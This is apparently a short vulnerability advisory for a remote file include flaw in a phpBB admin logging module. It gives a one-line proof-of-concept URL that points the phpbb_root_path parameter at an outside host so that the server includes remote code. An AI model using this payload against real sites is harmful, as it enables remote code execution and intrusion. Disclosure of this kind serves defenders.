Nivisec Admin Topic Action Logging Module Remote File Include Vulnerability

info
discussion
exploit
solution
references

Nivisec Admin Topic Action Logging Module Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof of concept is available:

http://www.example.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://www.example2.com